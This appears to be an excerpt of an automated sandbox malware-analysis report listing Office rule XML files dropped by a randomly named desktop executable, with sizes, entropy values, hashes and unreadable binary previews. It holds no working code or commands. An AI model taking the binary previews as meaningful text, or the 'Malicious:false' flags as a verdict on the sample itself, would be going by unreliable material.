                                                                                                                                      Preview:<?xml.._...!...$dG..Q...8....*..H..Rq-..4....}...5<......|,....i..'...^v. .=}...v.".2.TCCJz.EV..w.......D.#....N.1....o=..U..ux|..j......._.#........X(......L.......h7..S....N_..x..b.A..l....Q.eH.E..L."...E'...t.&.H1... .g.@..<=.m.|eb.F..>.i.%kw...S..[.*.u...{...o.<C..Sd.y+.G4..a.7os.k+...9T.2....6'0pK_..?..6....NN..`W..4J>.....-!.....+..v...=....%_.....7...m...J....u..Ga.....w.....@6h.nwh?M..T..o$>.l._`.wS..e..N|..cN.9^B..q._...dg.Av........D. WV9~=S..o..,.b.......a.<..5!....|w.:...ht.%...r. ...u.Gm&..~8b.QI.@.b.....Ula./..!..k+.O.l..e...8T..)..uc..SZy)Ju....f@7.^W3.\..7.X....y.p....T...;.w+.L..cqD}l......F..q.\.LV9...&x_ab.D.JR.&.k..MkN.T......}.'..s.q..`.P.=....5........h..........K.9.......p...ZV..g%..-5r..4+..n.f.....>......so,.....e....<..x.u...!##.."...S....-....!...7..y..<Q...F.E..i.`Ja....Rs..sW.:.t....S.A...^(.....G......5...lU..s..m.e.l.............".X.bQ....0D.....E... .[._y .5*.}...P......0u.-.C.&.S.7..........J.R.,..v9...}g..6.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180030v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1572
                                                                                                                                      Entropy (8bit):7.880232098009179
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:4E84yjy/6n3+RNTBuCZX8wXHDcHBC4AYx6+0836a+8w7GQ12p3WYPlCs+MgZgfGm:4E84I5mZ8wXHkBeqTpL2GQIB/wgiqD
                                                                                                                                      MD5:3DE48D1BD65C9E7E1627803C5562AB84
                                                                                                                                      SHA1:7BA8CE7FAEBCDA0414869B2A69174AE8E8E64029
                                                                                                                                      SHA-256:8BAF85CC19BEE38481D04206FDA49AABE95923AB43B6AC950BF3336812A3518E
                                                                                                                                      SHA-512:B4C7A1F5965D769180982F562D7869B39F3F9ED2074C5066938B874D290A79AE2EC9C9A1BCE4C9B03236D9737798E59D711D9A583B013056E6C2AAD5D86F5775
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.I.>.3\.9...Na...q.u.H........SFB.-%....A>.'.Y..8..M..f.6._.d..N8E.-..q}....@g'..3j.."3O.......yR.......H...>@...^..A......[....T...<..n]...=....%,.2.[ee.R.Cg...X...OW..x]...m..Z...0z#...3.....CI.....8l...-7.....y2..y.7l.?o...8b.f......S.sS+.9Oq.T..S.a.i.-1..4....C~./W1.9..et -......k...PU.....9.X..I.....-.8.......<..n..']0.+....V.f..u.j....dc......1....r.H@f../Ow.3..D.Av...5/.._..E^I....DC~h..}.;.....j....*..OtT....no..W..y...8;.2{......P.........o..."M.G......!.....)fi...&.u....x.`L.M ......!..4.r..XH....t..q...C>....]..w.,.2RMS.xZ..0@x...l...H]u.p....C.x..z..v...~..Q@....~Yp..O_....*..X....Py.I..B...:/T..]..F.B..)..5D.C..R_...:4.Fb....A2\.>..z.C...Mj..5..J....b......$;M.dQ.gN....._.O.A.bY.h.Q.....Y..7.....)....US.9s......O6........w[.6.b....H..w.#$J.".....N8M..y./.P.V.....q.r...........-...)...Uq..:.z..^{......vo.......S.$..d.A.o_.M..\e\.N...k.es'..^..w./.@7MW..g..cA..j....x..vML.1.o.."W..L.z.}q.[].z.'....;...&.;./.y\>K..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180031v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1978
                                                                                                                                      Entropy (8bit):7.899685743809269
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:m524EqcgiBC6BSUUvygn9nfPIvKnly8WvUDwD:s24Eq5l6UVvrnR3DbQUw
                                                                                                                                      MD5:099904A6DF5F59A8ADD1D90B39C54E14
                                                                                                                                      SHA1:C3B049C62DCC9BB7E3025ADC1DB0D0400EFBDBFD
                                                                                                                                      SHA-256:47190D1928A07DCDDA25E05CA2124928BA325C3C448EC7EE672A2C90951950BB
                                                                                                                                      SHA-512:269BF21DF4483D370F6BDE61E5083015A5A7933FC76747BEA787EB3F26142B076AA321BCAF75F441A4A5E5F376C43A73B0378F7EB515B23B56ACB24BBBF9F168
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml@.x.}..\... 0.....xD.Q..0U?.Q)...\.....5..%....`....t]c...qq....d..z.....J.....=p...\p.H.A...7..=o!%T..$1...+.,.bO...C..}.T.?I...v.J%.R....z.._EB.. .....>.......9.[T.$.F....O.....8U--F.q.TY...C_..Tw..M.&..l\..;.}..m...,._....p:,@..?......}W.9.i......g(....e.U.z&...K.6.x...S..>.a...q.&)......e...+.4.12.X....okq.pf.."T.. ..G.'.r....+..Qo."=.....%.s..\HD3n=...6...0Q.."..& z.T.....J...%..P.....DR9j.......#....e?2...}!M..).7,M.ou?[a.Um>....K.0..J..x3.Lx.l....Zrj...?...46.t.ROQ...........2..W...L.r....]9S=.u...]S..{.....?hL.@.u..P.FY.".,<&5..I.......c.pb...0.yQF\C..... c. ...;6@...3.....7..x@......w.\b&W(.... ..<..AH...N..n.R...[..*.p).t..I^.H.;.v..j..XM...a..iok.....-..4..&....x...T.i.S.\%....2P.-#.. e(.G...../>.U.../...-.9h4.Yo...0.*.....y|...t4}.fl....U..jfo.f....TS.X.$K........2..[......H.........Z..1-.....o.IU5.Iz..S..H&.T.X.3....x...%.n~..[......l...V;..#-u...:.A...L\.e......?42x.u~..Se...M..9..|..Rr)..WnqBV...Q..'7.6?=s..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180032v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1658
                                                                                                                                      Entropy (8bit):7.873105431214031
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:eDLOHsKS5ksBtXU8oCeIHhFbnSMawBF7mwUzcRt1ky17fLTR9FlyeeaEAcTeFkA7:VH213obIBFmI1R1rLTNQyOAbO0D
                                                                                                                                      MD5:949999535B6EBBDB25C21B9E8C040C26
                                                                                                                                      SHA1:299CD1D12131E73322D7FD9B8EA3E86751B86293
                                                                                                                                      SHA-256:74CD69F7779592692570DB837D2B1E0BE3D8A79F269235FE0A8C4A3CC966B61D
                                                                                                                                      SHA-512:4A77F890A86F247E892A7D008329A08239F2A9381A2F3A58047E45F3177055C10686F9A5C6975453EA15320336D6230CDC1840EC7708525B52E9DA3D3D68C652
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml'I....9Zv:....V,.\.......`%S.x.....mMJ.9<..6....<..L..7...i0..C...I....^E!...(c....".&.8.K...9.,..N..1'..H..M.....z.....w..;5..9doB...w.4.~.q[...\..9.j7.L]...I......9...CiDP..Jt...R~H.X(.~.....bY=....=C........C,..bK,y..R.:..y.....X..ay.FRA*.I..|...j..."...D..:....EN,..<+l.....C.i...)..o.am.S-...*HK.9...S.[O_..}.Uu/.W..5.Qe...Cn.!..7H1.?.G..".dh<q...v..j....1........T1.H.d.Tb.=.E...7./...s..?..5..m|..p.v.!...................z.5.).{.Y.H.F..V...L...tX#~+....~.6$.q..aX$.W..B.........w.....T!.. .C.{.%.;U...{q.$..K....*q...E.C..@........9%..tW...,]`3_3=.I.[>Q....K......;......:...u..A5.l....U.|3..k7........4.u(..".\.2.{.......6..Z...`.?.....;.-.=.5..m^....T...F..H......a_.:B.&.Mv..`..x.w|..xP...A....[..1f..PT..*.9.bX.i....`|....v......OJ.Z.p~.Y.w....Dm..\6.......A.<..\e&....2O..~;.Q...z.d..x..JjMU....Y...G{a..Jr.g....6.Mq.N..-6.......?Wh.B56,.q.9.h@.Id.3..e......i..Jj.4....3...Y....._.R.G4Q..+..@"...$7.D.x.-...y..nYs...U%.r..i.I..c=.cL7(#.`R.]?.B..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180034v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1698
                                                                                                                                      Entropy (8bit):7.874761566404461
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:zUMOLObtFML6QC1r67amcvkNemU+2ey2CED:Yuba6lDmcvkNoFxy
                                                                                                                                      MD5:36A2E7726589928FCCB7FF60C89E97B3
                                                                                                                                      SHA1:0B007FBC96DA91E8BB4A4A6DA59706EB70AE1065
                                                                                                                                      SHA-256:A2FDD85B2DF8983F1476BC77B7B22BD724284D028975685953131D13D399F30B
                                                                                                                                      SHA-512:358AC01947B3B58F2DA887082B1AD93BC4E4C7CEE945FAFBD3DC2E057193850A2B051B48407B5BC302A34F36EA73A050E19EFCEF3689130E4BDF1418E1535132
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..n..H9.E)R.y.b=t. .....].W]"T.....,.v:...V'..L....+.[....\.J......aRs3?<..oaI4...(..+.:..:../.......G....H.S<..T+...P.%..8.3....Ui.......W@...G ?..b.4..k...S%\#A~.>.K.;.2.YfT2;.....MW.8^.t..".!.)....Ad.*.\........^.W."h]ntb...Agm.B).B.j..UB.tQ".....c4.......E.....h.......-L...5T`..c4.....nf=..=,A..`....... .9.G...... !.C..>..hc.........'.7%.i.k.lv.JX,.d...=..=P5..v...$.....6.B.P...m....BV..W.../1w..i.1...R.'.s.Y.Ga;3.F...H.g..B.a..p.Ze.....`.....B[..5.......3..\'Xm.... .....h.+..5.En...s........l.....f.H..=c..>..6.U.ixo.z^R..m....V.&%H.F...@.Z.e."h.l....Yf.....V5.Rm..5...B5....).a..........O.....T.k..S!.t'..L..m....<]........3.b.-..%.~.e`!A....*G..s.;T..9..._H.Ns...p.~k.&...T.y.........1..6...y.r.r.....U.P.a.O.....H.qH.@.dR...|......F...5....P..@........(t...o..DD.Y..z..[.J.gG..>%........A2....GkP.Le..D.........K#.N..?.>J..J0.H`8..............!.#..0d(7.\...a..{9....?...n.E.\2'.zE.p...9M|.a..2K,8U.......~.K.m....Al.R.6...{.>.....y...

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180043v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1715
                                                                                                                                      Entropy (8bit):7.897707391798821
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:TPNbcwh/lWTzwSLocf9ME3GipWAVNYryq2gD:TP1cMlWYSccf91ptYryq7
                                                                                                                                      MD5:BEBBF246DBDC9ED179DD985D87E6AF2C
                                                                                                                                      SHA1:AAE19D4A56F9FE20599C6CCDC6FB8FBDC298B587
                                                                                                                                      SHA-256:94FAEBE939C19A91C6A60C758CB0CAC1189AB17F531CECA35AED03AE993362B8
                                                                                                                                      SHA-512:1C64DC9063425EB1A94F5919E3AAD78BB3AAC21F6D1F73BA03540B5B9FF8294EBD81D6E731F65B9ACC8CDCB488420F076D6B7768CE25D2865CE8C5854E4F6396
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.R2.-.q!........p|..`..gi.|[...t..."..e.0..._.d.<...2.....-...L.u....L....Zm....V.k4`..p....3.rT.7P.D..#..._K.%.h%:#h7.ml!...~I..Y.2.=.[...(....5....uS.#K>lz..@.J.."...T&.:{..|..FI.i.i].....M"...I...AX<.sLr!.W.....4......]...??.R.[.cI..o.......H.[...k..P....Q..:[...;.._EB....051..m.'T..)...^.,F..+C......1..4... .VnW..Q..&.Ob...|.....5....9.;.t4...`.$m...4^.SsX..Y.O../...)2.*..0H.+.../..K.-.e....m5......M.......B................b.sc...B.U..1X..... ...u"M?..4m.=.HC..8..7A.F......^1...g~..e...,?...[w.F...6].....v.~...dn)I...ecr.NB1A.3...4.i...4..T.7...d.. ..<.../I<.....e...[^./n..........x....F..|).{!.|.T..n.k...tU..]......@&.8.....>#G....u.#<..6m.9....p....e.n..2I.$./|3/....sQ..5.l...j..0._........p..'.?.......Ap.o.T[..N4;=.....*.f...#v.i...v]..L.=..h.j........M...u[.Xtq]....%..7.S?pg..:..l..roA...?8..b....3......(.a.y.M..f....;O.]8X."......,..U..._.!...W..3...B(w..|.V..a.5.j..(O.#..b-......YE4....u.FVs..9..F.&.K.<D.....=..g.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180049v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2858
                                                                                                                                      Entropy (8bit):7.929626701518156
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:bRHgazFNwcH4itrVz3Nhzy/dahcFuBEgL+XKPB0Q7rvIVhyt7/S/jpvodUBBWD:JgazF+i48zNhzy/icFuBEgLlPh7Oo7/F
                                                                                                                                      MD5:4D7EB9B9F91DF2BD483A7C403A8269FD
                                                                                                                                      SHA1:FDC13A5CFEF7358FFC493F406B18FACB756A4DDF
                                                                                                                                      SHA-256:F2EE33FD2C38BF36C6E0A291F22EE37AFE005B6926C81D6E2F085902456AA635
                                                                                                                                      SHA-512:5BBBC4A3FB621BB23C542D62F694B606F7DBA6CA842E08079714E74165420FA982C58D712AF5E78AD6A5314DC67A08AB8F2992933E23094377D519DCBCEB5073
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlG.s.*.z..Cn..g..f..3s..Fj...7g.(.dfRl.h....P:<...x,h..N..+j......!7p.O..#hd=..Yci.PiH.H.]d. o.W0.....g.[..D.0vJ0..j...0..x....G...m..[.......)^..lv..K.m?.......8..L.0..0..J....(..4..........(...y\;/....w..FM...C....3.....\`zL..B.T.8...A..0a8.H.Q/X,...d:.6R..8]...H.1^ N..-.s..H@.6.)=O.. ..A8.......sa^.X...)e...-.f.n.nk...A.F|...'....)...t..?...=.[.".C9....%..#.3N....Q..P.>.~.3B*e...0...,..].........x..n......S.'.~..(...O.5.=:E........v..SL.....}.kt.|..lK.....!]e.'....l.u.]O..W........B.;K.....|....).[..$.Q`.Q..s\...v=.......mj...,v....J.@..)*.O..Z5....~.w.......J.j.......!...1.......T...J~i._....%['.........;.Z.2?..x.1)l.n..[....c........!^...mm.R......mi%..Ai.u...zm>.i......g.F..;.&.. ..+.."=./.......BJ..+ia.2...@.T...<S......D*...1.,J..(wI.....q..F7.T.?:...e4.q...J&..}_Pr....!....z...<`mj..b'....6(..,.Y..il.H&O.w.tr<p00..mg.I..E<B~.^..d....&...z...,.0v......(j..b.pJ...,........'....J...+.....NMnZ@?...O$....W......j.4)?o......S.S.{I.+...e\....

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180051v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1230
                                                                                                                                      Entropy (8bit):7.812926350575516
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:IQ5HT6HJaWgwOiGvEYJ35+BO3MsmRSrYI3+eYS0W2cYQ/eFFbD:7WpFxYJpkrsmRCRuQ/e3D
                                                                                                                                      MD5:0B22AB5F449EB4CFEDF045EDC0F896B8
                                                                                                                                      SHA1:8C9C07A040C533B0917800DA33366B48F915BF16
                                                                                                                                      SHA-256:68DF8BF3F7FFCADD1FBAC7A6C31EA23ACFF01E1A241A00C7EDD99387906134D7
                                                                                                                                      SHA-512:C09F4DBE34FAF2A634A10AF37A61BAAD6263C66C080B5B8971467C143DCF505C7ED023AEEBA86FBEF71C09E2D5A8ACF4FE98D353F52A768DCFFDD1F3AA8E3745
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlu.h..>.j.........6iq..yr.(.d.T.X.9.\]....Y .F)......0BBgc.2.........0.../.t.]....W#.cV...(Ce...i....Z...E.En][.01./F..T.\.*R..Tg......:Ep.r......[......o.P.....tz.{o/@.3.#.m[Z......R.....KR#D.,.\*...9....I..C.<..}8...1m!p.....u.1K|e...b,.bsE..|.q....8..#......A.6.3.K.?V.2....F../+$..fmH......C......g.4J....R.....7?&..b..`.....#...j.b2.G....7.a.....=.s..r....r.).eqN.R.@...IzV......b.|{.%e]...l.p.G}...p..*.S3.....C.kk%..V.[...9q...nn5a.B...L.. .....O....^U...Y..C...UR.......w.......\CF4v..B.N.K.|......a..8..Qu....zV.^......C..T.5.5.{.yl.=?>.........J.W......bj.N....p.u.a.V:..A7....y..Hi.id.O`..4..u.0.>...N..r..>.........s^^.....KD.?.+.P.t.7H......=6..........."..l.0..).[.:.S..(X........."...q...5.V..A5a$..|lpzA..C.}.n.u.c...A.Bb...D..5....3..*X..i~n...-....~.".0Hy.F^.b...&...~....is......L..........p.....O......].t...,E....!.d..orf..J.......l..."$.l...}....f...F.....EO....K.....D.........t...Z.z.'.<.....S.=4te.WMX*..p,.4u.L..|R.@Ry..a..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180052v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2834
                                                                                                                                      Entropy (8bit):7.925784291556066
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:7mEpuS2+/oAoU4THTtHB+6K6UwkL27FaRPTkxnH18wpVpYXqyQD:73ou/xoU4LTdK6RkL2YPuHN6XZM
                                                                                                                                      MD5:7AEEBCE0C852E84D00B47AD22F81F3C7
                                                                                                                                      SHA1:088076109909F0CEE2EB7ABFCECA468EF0D2EDE2
                                                                                                                                      SHA-256:64F2E61101086EB46B95FF7D149038F22008EDA8359D70F48902A707C29F5346
                                                                                                                                      SHA-512:9B5BACB82DC90A1789E9690D8508C4E931CC13551CEA26D1AE3A3D800138D50AB1F9C384383286698C396753E99C2A671EA637F073DE86042E2B48515F1368F5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.....L2Q..c.B.ew..3d....RF..R..3[..qUB.8.......WR..N..NKH...U._.U...A....m..A....T....6..7l.<...gK.....b......x.........~..........60. .0.n......pu.w..{....R...'.....!...2..0..n.nY..k.).V.E...-......h9n..Vl=..rq.3]>.5%..m..|.....-...,.H.....]......$..j..r..`..._t.G..L..s.9..16......U..D2..f......d.jn.^..5..MT..{p2n....x.....jG...rA....{c...}.Qc.....t:.Z8..Wh.....6>....q9.Q....{E2dn..K............).8.......?..h...C..^...y/.&........"....)8...g.R..v...r.T...[....PC....dC46..d<..}.!.......}....5Mz......M.U.....eT.:....,..3Np6V...F..b..uDFa.l.?..A...V..W:.q..X\Jr...Cx3n...\Q.JP..>..bx.m........2zOL.0...>{.O.).X...W....Dj.x.f...;..:.\.OQL..'...R...&K.mY.0..@R)Ek..l...!%......cj.....k...%.~w.<m......s......:.!T...l.4a.F..j......B.Y...Ct.........+........O...Nt:.0.U).`>H.\.y...>...=.L.2d...._'.8.q.D.%.=:....+.RI#i.I.h-&...g.RL......CD......EG...`.t5a.?."O...$..3..>m.|.u.<.B..s?..w9)LQE.4|,......K<.Kz.......%..l....U-z..J.&$..h.IHAz.....yE.....7N.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180057v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2008
                                                                                                                                      Entropy (8bit):7.914814583460563
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:pKMLby6tCYGZzj4dW2uBk6tw3ozjIRIfvmyM8fwI614IVKCYWvD:pKiTIYmEdAdtw3oPIRIfbKlCr4
                                                                                                                                      MD5:2F3AA7904A8C784443DE869F1136C880
                                                                                                                                      SHA1:D98D5C9709696F573331F93D030D4321D7408432
                                                                                                                                      SHA-256:629F2DD45700285EC7B703577231ED32713299514EEA37CB6C8D99FBB9D9E6EC
                                                                                                                                      SHA-512:06815C36DD8CF1F2D5BA885DF9CA4D2B4699A841301EFBD559E188933641E5C1F6299DCF7E162AB9898F1E26DF00348925B454CF43E6DC4568E48C5699C16E76
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.......O....!..<./]j...\I.gl.Y.%.V.6.5...& N....V. .7..5...!f.;.....QE>..m.$fPT....Y........w....B...bO.9.G,.V...8.1.u.u/.,_..}.T....&.66:.1.71.W...n\.*...wO.....%3...X......9..n..H9...j....Dp....`q=]IX8.......6..F.K..p..@..E.$.F1.w0..M.A..:r..*.../l{.)...<.....o.. oi.GdM..^V}...`.=Y...|...ur.'g.).`.#r?#.5|.........cW.S,v.o...8|....}.d%...W...^.@..[.R]...I'..}Y......u.R#.R.xLH..q....z.....>..T&..iV...~...(.(...pKww.I....!.u(.K.,.Er.(2Or......h.lc..]&).y......A......3.1._R...`....../t..:y.p./....w7F..).i3....2...a......L.T.:..T..m.]B..O.x._.1 ...v.......JYF.'.U.JU.G....2V~.fUZIN...\R....n|9..mZ...P...`.$.v..X.Jt.(.xg'..B..@~.O..:.*..l..;U.}.Y.`....d...........V.&.]b.1{.f...`$.x..._....3..>..V...*.f.{.S.J.~.............x..a.^.....{..++....n.k+."(..p<..K..O..{.6.}|....7......uT...`..:... ;..3e...oa..z..54..q'....u..,Uf.k.'..`].-f...C........V......SX\.QHU"Y..3....#_...=........T...DB....r......)......L@.bz......ay......

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180058v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2453
                                                                                                                                      Entropy (8bit):7.914915195698072
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:Oi542xvj+6QKP/DD0dqdkEcT0aWn7H/jIosmZt/JwJTHYiVC3gJTHaaOD:Oi5VN+qvsqK4Z7H/cox/iJTW86d
                                                                                                                                      MD5:835919FDA2C893BCFA25D5C820C34215
                                                                                                                                      SHA1:DF5BD2FB6317973415667BDC14E29487BB986253
                                                                                                                                      SHA-256:468809EDA1291DA4A1106DEEDD93277BE957846398BFE0C7514B974DEF3C2BDB
                                                                                                                                      SHA-512:33DA246EBDCBA8B8E72E1B0961413F1ECE4BEAAD5EE74AC345B2912B72193B6FE3A324A2C86ED733F23BAAADF5E3102C6BC5305065390073D03D77574EB2BC38
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.=.....<.5`9z..1...I.....y>....E.L...'u..+!~..."....yr.. .n.\...'.......{.=..I.......5.ip.F!E=dC.....d.5;.....M.b~..2.d+'...).p@...V.fq.........b..J@m....P........F..#....78.:.c!}Si.f(Zj.On.@.-]/..-=gY.".z.T5..r.0.....ZQ.G.E.dY...j.(..9....A....-P..`V..Vs.Q.9e.>.K.O,k.Bf..5..@.3>.G;..^.-...[.v.#..-JH..tgD..?.....4..S..uZ.+..CZ..N.?.c...w_..../...H8.L.G..(.....9.0......F.E.b.K...g)5Jb.6}.@.?..P..e....L"..e-8%...Iv...........:.Ol..9...8Y._.b..,C.0[K.8k-..Za...........mW@..y...d0'.%.L....}.y..;....[Z...d..S7.l.eMiJz.....*O.;...B...I..hw...=...wm.w....~.J.:...9f.J.........a..#(~.....Q+..>...3=...%....2tm`N_.:..VI+,....<3..?*...<..F..s.........XE...n..-.:...[M......x.....\....C.v.sE.(h3......e.....D...]h...?.5...rp~.'>..._.S.C.[...#W.'.\9.'Sc..P...%,..NfA.Q'..h..<.t.).........a...~.n`r. z.hh@.!...7....[*.CH...s...P~.%....86;.V.M ...A..<.N...o.....P.2G....*4.:..f......l...>...-F....!........;N..@.h...@>ETP.kBx.lJ........{...Z.....:...

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180059v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1568
                                                                                                                                      Entropy (8bit):7.859916665277699
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:ggaUJQxy2r7bq4gb+8RGxxFqwoB1N1I4djmhulOJqm+tRUrwPoeC+DWiItf5+5bD:ggky2ravb+8RSu1PB44kJL+PU54LIt8D
                                                                                                                                      MD5:278661AE846978EDC30902F3DBE10B7C
                                                                                                                                      SHA1:B044FD72E770CCF29824627242D5C0DAC53FFC46
                                                                                                                                      SHA-256:0427DB46F2467D7A33456BE8B45618F7187D34CF1EFD8B0B560B0A4A451A4C2B
                                                                                                                                      SHA-512:4CAAE1CB01CB98B6ED71ADC414E1A887BD91A545C7FA1DF7181DFFDF23F13445179CEDEE43C8D27AC9D5CF96392A49B326360C8D59153BAEFDC7A3716C413E68
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.t.I...?md..0;... .\.....T.... s..).N.lt.....A.C../.x.F.g...-l[....5.7...5.DEjY3......wM+..T.Xr.( ..RJhDgi.T5R..&.Zw...=i{.b.L..(.%.....a}n.QE<_...8j9u..O.BEI...I.8.)c..V.."b..@T(>.^..Kz.,.U.g...cp........$n.F.P...V.7=Y:.HA..........r.G..H...6....&WGv..x.,}.Nz../....ui.].'..Hp.R.kT.=.......F.8..GBH....Y.p..Zi......!8.f..'...../Ma....'...@..:s,s.X.A.?...h@.....R./Fh_l"......@".....j...(..\...E (<k..v.....O!D.6...(...3..M...O.......m..rg...)..-'.........@WI/"..~.....i.O..|..c..\{...H.....W......p...N2....U.}.......F.M>W.]4..&...Z.Z.O.D....3t...~&U..~..h3ZM.d/0gT?..O.#......VZ..0......g.h.#T1GNHX=(+xQ..!..a.wh.S._6..........3....k.0.....]Ejc:.}.....W....2d#'Y.,7:.....e.iGN.;.1...~x.......T.l,.W.........{..._b..CG..l.n.,.p....aJ.i.....!..R..y,$......O.>..pa... @.....X...F.K.G..>k.w!f...*|.=P_....\......u...m......f1.d.v..".<..ge....".f.....'.4....!..&.:bXM3'7.... ..|......*.F0|.2p..p.....&....I.n`.5...E6..h.....oK._`.'@..raVRI...n...N.....a

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180063v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1570
                                                                                                                                      Entropy (8bit):7.857813338988268
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:Sdm0HoyF82gMZAIQcAk5PFPtf4loqk0dWEMGFZFd6dIt0ny/aQfCPqgwHbbD:3Ao/sZA7cAk5PFPZ4NFqG+y/aQfwsHfD
                                                                                                                                      MD5:C50635A947FC1B921441FB2334BC240B
                                                                                                                                      SHA1:EA4A21AE3A5179A0C69663EDDCCF7ACBE4672CB3
                                                                                                                                      SHA-256:7177C49E658CDA0B087ADE8DB6FDB522ADD8F072317549DAD934D3AFF67A5A71
                                                                                                                                      SHA-512:31A4C49B9544C1DF823C5BEA44C146F21F641FDD7B81185318B6FB067C698DFE4DBC43170A0D11337940230B3627A8BAD1050D8C4763885C7C8328539B8F9FEA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.............b$.z.R&..:....|...=....#..........x..(..2.<....^*....o.TQ.E.x.{..$.....]G.;..jW..>..s.../....%YG4..M0uu..}....|R\f.....Y.nM{Y+[..|....{6...A...<.gj...L..v....<}....0+.F..N...kj<v.3.#2g.:..v^.*`.Y.?....}..... ..d".e........4.9..V?.Eq....]....y...........:y.`@....Jx.`.0.>..../.(.....k....6.I.[1.A^G.O....9.L.}8px.{.^<.B.t=.k......bI.i.f...9...&8.o..d..w(.I'........|.^.V.....6..=.e....VR.[/2.V...:%Q`2I...x{....C~.......=.... d$.x.I..'~.l.........}.?...$.6_.9_]9^...{.5b.I.%3.m..~%b.......`.k....G.<q.....pFO.Z.DP]....X....F....*......~Ob!......._.Np+.ic....._.Z.#k.I4..[b..*..M.x...1........P..B.R{x).I`.vkf.......102..SZD.......|v.g.v...L.?N....y"...n.$MR_]....=.0r..:....UYa.....@..x.........._....un.f_..*.~z.f...!....z..k4.......yu....)...ydw....*._4~r0...8c?.9....u.>..P.C9.....I..D2.....u...X...!. .W....S"O.p*. ..}.iO;.*....<0.F8.ev....Jf..\T..+..!.0.%>..@.m.P..5Ie......6......*.....7......O.....f.r..K..8.....CA.....l.3.....v.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180064v1.xml

                                                                                                                                      Download File
